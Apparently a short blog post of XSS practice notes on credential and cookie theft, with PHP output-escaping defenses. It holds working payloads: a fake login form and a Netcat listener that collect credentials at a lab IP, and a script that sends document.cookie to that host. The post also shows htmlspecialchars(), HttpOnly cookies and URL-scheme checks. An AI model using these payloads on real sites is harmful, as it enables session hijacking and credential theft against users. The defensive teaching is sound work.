XSS Cross-Site Scripting Netcat Cookies PHP

XSS: Cookie Theft & Fake Forms

Jan 1, 2022

Practice notes on Cross-Site Scripting (XSS) attacks: capturing credentials with an injected fake form and a Netcat listener, stealing session cookies, and using htmlspecialchars() as a defense.

1. Credential Theft via XSS + Netcat

nc -lvp 1337

<form action="http://10.0.2.15:1337">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>

2. Cookie Theft

<script>img=new Image();img.src="http://10.0.2.15:800/a.php?"+document.cookie;</script>

3. Defense: htmlspecialchars()

$input = htmlspecialchars($_POST['data'], ENT_QUOTES, 'UTF-8');
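
The htmlspecialchars() call above applied at output time, in element and quoted-attribute context, together with two things it does not cover on its own: URL schemes and the cookie exposure from section 2. This is an added example, not code from the original page; the helper names e() and safe_href() and the sample strings are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Defense in depth for section 2: an HttpOnly session cookie is not readable
// through document.cookie. Must be set before session_start() and any output.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);

// Hypothetical helper: escape at output time for HTML text and quoted attributes.
function e(string $value): string
{
    // ENT_QUOTES encodes both " and ', so a value cannot close a quoted attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: htmlspecialchars() has nothing to encode in
// "javascript:...", so URL attributes also need a scheme allow-list.
// Relative URLs (no scheme) are rejected here as well.
function safe_href(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? e($url) : '#';
}

// Constructed sample input, modelled on the markup in sections 1 and 2.
$samples = [
    '<script>img=new Image();</script>',
    '"><form action="http://10.0.2.15:1337">',
    "' onmouseover='x",
];

foreach ($samples as $raw) {
    // Element content: < and > arrive as &lt; and &gt;, so no tag is created.
    echo '<p>' . e($raw) . "</p>\n";
    // Quoted attribute: " and ' arrive as &quot; and &#039;, so the value stays inside.
    echo '<input type="text" name="data" value="' . e($raw) . "\">\n";
}

// The javascript: URL is replaced by "#"; an https URL passes through escaped.
echo '<a href="' . safe_href('javascript:alert(1)') . "\">link</a>\n";
echo '<a href="' . safe_href('https://example.com/?a=1&b=2') . "\">link</a>\n";
```

Escaping where the value is written into HTML, rather than once when it is read from $_POST, keeps the stored data unmodified and makes the encoding match the context it lands in.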